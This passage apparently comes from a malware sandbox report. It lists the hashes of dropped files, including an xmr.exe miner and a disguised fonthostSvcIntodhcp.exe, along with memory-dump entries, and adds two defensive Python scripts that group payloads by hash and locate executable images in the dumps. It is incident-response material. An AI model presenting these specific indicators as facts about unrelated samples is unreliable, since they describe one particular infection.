SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

\Users\Admin\AppData\Roaming\xmr.exe
MD5: f99c879d74bf1355905734a411191276
SHA1: 103a41ade035585e4834f7b939e15608fb64d201
SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

\fonthostSvc\fonthostSvcIntodhcp.exe
MD5: 8cf49d252229ed14a26b9a2b45771e1d
SHA1: d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA256: 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512: 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
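The dropped-file listing above is a series of paths, each with four digests, and several of those paths carry identical digests (etc.exe and services32.exe, services64.exe and xmr.exe, the two fonthostSvcIntodhcp.exe locations). The Python below is an added example and is not part of this report or of the sandbox that produced it: it parses a listing in this layout, tolerating the extraction form in which a label is fused to the value after it, collapses the records by SHA-256 so that each payload becomes one indicator with its aliases, and recomputes the same four digests for a local copy so a captured file can be matched against a record. The sample listing is a constructed subset of the records above; the record layout, regexes and function names are this example's own assumptions.

```python
"""Parse the dropped-files section of a sandbox report into records keyed by
SHA-256, so that one payload written under several names collapses to one
indicator, and recompute digests of a local copy to confirm it is that payload."""
import hashlib
import re
from collections import defaultdict

# Constructed sample: a subset of the records in this report, one record per
# '-' separated block. The second record is left in the extraction-damaged
# form in which each label is fused to the value that follows it ("SHA141ae...");
# the parser accepts both forms.
DROPPED_FILES = r"""
\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA1
41ae0d56b863d8155865548e8231e1994e197c21
SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
\Users\Admin\AppData\Roaming\services32.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276
SHA1
103a41ade035585e4834f7b939e15608fb64d201
SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
"""

# Each digest is anchored by its label and its exact hex length, so a label fused
# to its value ("SHA11eb3...") still splits at the right place.
HASH_RE = {
    "md5": re.compile(r"MD5\s*([0-9a-f]{32})(?![0-9a-f])"),
    "sha1": re.compile(r"SHA1\s*([0-9a-f]{40})(?![0-9a-f])"),
    "sha256": re.compile(r"SHA256\s*([0-9a-f]{64})(?![0-9a-f])"),
    "sha512": re.compile(r"SHA512\s*([0-9a-f]{128})(?![0-9a-f])"),
}


def parse_records(listing: str):
    """Split the listing on '-' lines; each block is one dropped file."""
    records = []
    for block in listing.strip().split("\n-"):
        text = " ".join(l.strip() for l in block.strip().splitlines())
        if not text:
            continue
        rec = {"path": text.split("MD5", 1)[0].strip()}
        for name, rx in HASH_RE.items():
            m = rx.search(text)
            rec[name] = m.group(1) if m else None
        records.append(rec)
    return records


def by_sha256(records):
    """Map each SHA-256 to the sorted set of paths it was written to."""
    groups = defaultdict(set)
    for r in records:
        if r["sha256"]:
            groups[r["sha256"]].add(r["path"])
    return {h: sorted(p) for h, p in groups.items()}


def aliases(records):
    """Payloads dropped under more than one name: one indicator, several paths."""
    return {h: p for h, p in by_sha256(records).items() if len(p) > 1}


def digests_of(data: bytes):
    """The same four digests the report lists, for checking a local copy."""
    return {n: getattr(hashlib, n)(data).hexdigest() for n in HASH_RE}


def matches_record(data: bytes, rec) -> bool:
    d = digests_of(data)
    return all(d[n] == rec[n] for n in HASH_RE if rec.get(n))


if __name__ == "__main__":
    recs = parse_records(DROPPED_FILES)
    for h, paths in by_sha256(recs).items():
        print(h, *paths, sep="\n    ")
```

Run it on the full listing (paste the records into DROPPED_FILES) and the SHA-256 keys of by_sha256 are the deduplicated file indicators to block or hunt for; the aliases map tells you which names to expect for the same payload on other hosts.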
memory/660-140-0x0000000000000000-mapping.dmp
-
memory/660-143-0x000000013FAE0000-0x000000013FAE1000-memory.dmp
Filesize
4KB
-
memory/660-153-0x000000001BB70000-0x000000001BB72000-memory.dmp
Filesize
8KB
-
memory/992-135-0x0000000000000000-mapping.dmp
-
memory/1148-138-0x0000000000000000-mapping.dmp
-
memory/1152-91-0x0000000000000000-mapping.dmp
-
memory/1244-90-0x0000000000000000-mapping.dmp
-
memory/1276-95-0x0000000000000000-mapping.dmp
-
memory/1308-88-0x000000001AFE0000-0x000000001AFE2000-memory.dmp
Filesize
8KB
-
memory/1308-86-0x0000000000970000-0x0000000000971000-memory.dmp
Filesize
4KB
-
memory/1308-83-0x0000000000000000-mapping.dmp
-
memory/1312-96-0x0000000000000000-mapping.dmp
-
memory/1424-113-0x00000000005C0000-0x00000000005C6000-memory.dmp
Filesize
24KB
-
memory/1424-69-0x000000013FAE0000-0x000000013FAE1000-memory.dmp
Filesize
4KB
-
memory/1424-119-0x000000001C8D0000-0x000000001C8D2000-memory.dmp
Filesize
8KB
-
memory/1424-64-0x0000000000000000-mapping.dmp
-
memory/1500-136-0x0000000000000000-mapping.dmp
-
memory/1572-98-0x0000000000000000-mapping.dmp
-
memory/1608-89-0x0000000000000000-mapping.dmp
-
memory/1616-94-0x0000000000000000-mapping.dmp
-
memory/1632-103-0x0000000000000000-mapping.dmp
-
memory/1640-59-0x00000000769B1000-0x00000000769B3000-memory.dmp
Filesize
8KB
-
memory/1676-81-0x0000000000000000-mapping.dmp
-
memory/1684-117-0x0000000000000000-mapping.dmp
-
memory/1692-93-0x0000000000000000-mapping.dmp
-
memory/1728-61-0x0000000000000000-mapping.dmp
-
memory/1740-137-0x0000000000000000-mapping.dmp
-
memory/1740-115-0x0000000000000000-mapping.dmp
-
memory/1804-116-0x0000000000000000-mapping.dmp
-
memory/1816-100-0x0000000000000000-mapping.dmp
-
memory/1860-92-0x0000000000000000-mapping.dmp
-
memory/1908-160-0x0000000140000000-0x0000000140758000-memory.dmp
Filesize
7.3MB
-
memory/1908-161-0x00000001402EB66C-mapping.dmp
-
memory/1908-162-0x00000000000E0000-0x0000000000100000-memory.dmp
Filesize
128KB
-
memory/1908-163-0x0000000140000000-0x0000000140758000-memory.dmp
Filesize
7.3MB
-
memory/1908-164-0x00000000002E0000-0x0000000000300000-memory.dmp
Filesize
128KB
-
memory/1908-166-0x0000000000300000-0x0000000000320000-memory.dmp
Filesize
128KB
-
memory/1908-165-0x00000000002E0000-0x0000000000300000-memory.dmp
Filesize
128KB
-
memory/1916-99-0x0000000000000000-mapping.dmp
-
memory/1924-102-0x0000000000000000-mapping.dmp
-
memory/1924-118-0x0000000000000000-mapping.dmp
-
memory/1928-146-0x0000000000000000-mapping.dmp
-
memory/1928-149-0x000000013F1C0000-0x000000013F1C1000-memory.dmp
Filesize
4KB
-
memory/1928-154-0x000000001BB70000-0x000000001BB72000-memory.dmp
Filesize
8KB
-
memory/1952-73-0x000000013F4F0000-0x000000013F4F1000-memory.dmp
Filesize
4KB
-
memory/1952-120-0x0000000002350000-0x0000000002352000-memory.dmp
Filesize
8KB
-
memory/1952-114-0x0000000002190000-0x0000000002199000-memory.dmp
Filesize
36KB
-
memory/1952-68-0x0000000000000000-mapping.dmp
-
memory/1956-97-0x0000000000000000-mapping.dmp
-
memory/1984-77-0x0000000000000000-mapping.dmp
-
memory/2000-104-0x0000000000000000-mapping.dmp
-
memory/2000-107-0x0000000000F40000-0x0000000000F41000-memory.dmp
Filesize
4KB
-
memory/2000-112-0x0000000000820000-0x0000000000822000-memory.dmp
Filesize
8KB
-
memory/2000-110-0x00000000001F0000-0x00000000001F5000-memory.dmp
Filesize
20KB
-
memory/2000-111-0x0000000000420000-0x0000000000422000-memory.dmp
Filesize
8KB
-
memory/2000-109-0x000000001B160000-0x000000001B162000-memory.dmp
Filesize
8KB
-
memory/2008-152-0x000000001C7F0000-0x000000001C7F2000-memory.dmp
Filesize
8KB
-
memory/2008-129-0x000000013F3E0000-0x000000013F3E1000-memory.dmp
Filesize
4KB
-
memory/2008-125-0x0000000000000000-mapping.dmp
-
memory/2036-151-0x000000001ACD0000-0x000000001ACD2000-memory.dmp
Filesize
8KB
-
memory/2036-122-0x0000000000000000-mapping.dmp
-
memory/2036-130-0x000000013F110000-0x000000013F111000-memory.dmp
Filesize
4KB
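Each memory-dump name above encodes a PID, a dump index and either an address range (a region dump, which also carries a reported size) or a single address (a mapping dump). The Python below is an added example and is not part of this report or of the sandbox that produced it: it parses names in that layout, checks that every reported size agrees with the address range, finds which captured region of the same process a mapping address falls inside, and lists regions that start at 0x140000000, the linker's default image base for a 64-bit PE, and are large enough to hold a whole executable image. The sample is a constructed subset of the entries above; the size-rendering convention (whole KB below 1 MB, one-decimal MB above, 1024-based) is inferred from those entries and is an assumption, as are the regexes and function names.

```python
"""Parse memory-dump entries from a sandbox report, check the reported sizes
against their address ranges, and relate mapping dumps to the region dumps
that contain them."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a subset of the entries in this report, in the listing's
# own layout. The first name has the "Filesize" label fused to it, as it
# appears after extraction; the parser accepts both forms.
MEMORY_DUMPS = """
memory/1908-160-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1908-161-0x00000001402EB66C-mapping.dmp
-
memory/1908-162-0x00000000000E0000-0x0000000000100000-memory.dmp
Filesize
128KB
-
memory/2000-104-0x0000000000000000-mapping.dmp
-
memory/2000-107-0x0000000000F40000-0x0000000000F41000-memory.dmp
Filesize
4KB
-
"""

REGION_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")
MAPPING_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-mapping\.dmp")

# Default image base of a 64-bit PE executable (the linker default for x64).
X64_IMAGE_BASE = 0x140000000


@dataclass
class Dump:
    pid: int
    index: int
    kind: str                       # "region" (start..end) or "mapping" (one address)
    start: int
    end: Optional[int] = None
    reported: Optional[str] = None  # size string printed in the report


def human_size(nbytes: int) -> str:
    """Render a byte count the way the report does (assumed convention inferred
    from its entries): whole KiB below 1 MiB, otherwise MiB with one decimal."""
    if nbytes < 1 << 20:
        return f"{nbytes // 1024}KB"
    return f"{nbytes / (1 << 20):.1f}MB"


def parse_dumps(listing: str):
    dumps = []
    for raw in listing.strip().splitlines():
        line = raw.strip()
        if line in ("", "-", "Filesize"):
            continue
        m = REGION_RE.match(line)   # match() ignores a fused trailing "Filesize"
        if m:
            pid, idx, start, end = m.groups()
            dumps.append(Dump(int(pid), int(idx), "region", int(start, 16), int(end, 16)))
            continue
        m = MAPPING_RE.match(line)
        if m:
            pid, idx, addr = m.groups()
            dumps.append(Dump(int(pid), int(idx), "mapping", int(addr, 16)))
            continue
        # Any other line is the size value of the preceding region entry.
        if dumps and dumps[-1].kind == "region" and dumps[-1].reported is None:
            dumps[-1].reported = line
    return dumps


def size_mismatches(dumps):
    """Region dumps whose reported size disagrees with end - start."""
    return [d for d in dumps
            if d.kind == "region" and d.reported and human_size(d.end - d.start) != d.reported]


def containing_region(dumps, mapping: Dump) -> Optional[Dump]:
    """The region dump of the same process that contains a mapping address, if any."""
    for d in dumps:
        if d.kind == "region" and d.pid == mapping.pid and d.start <= mapping.start < d.end:
            return d
    return None


def image_base_regions(dumps, base=X64_IMAGE_BASE, min_bytes=1 << 20):
    """Regions starting at the PE image base and at least min_bytes long: a whole
    executable image living in that process, which is what to carve and scan."""
    return [d for d in dumps if d.kind == "region" and d.start == base and d.end - d.start >= min_bytes]


if __name__ == "__main__":
    dumps = parse_dumps(MEMORY_DUMPS)
    print("size mismatches:", [(d.pid, d.index) for d in size_mismatches(dumps)])
    for d in dumps:
        if d.kind == "mapping":
            r = containing_region(dumps, d)
            print(f"pid {d.pid} mapping {d.index} @ {d.start:#x} ->",
                  f"region {r.index}" if r else "no captured region")
    print("image-base regions:",
          [(d.pid, d.index, human_size(d.end - d.start)) for d in image_base_regions(dumps)])
```

On the sample, the 1908-161 mapping address 0x1402EB66C resolves to region 160, the 7.3MB range at 0x140000000 in the same process, while the zero-address mapping dumps resolve to nothing; a region that large at the x64 image base is the dump to pull when a rule hit is reported against that process.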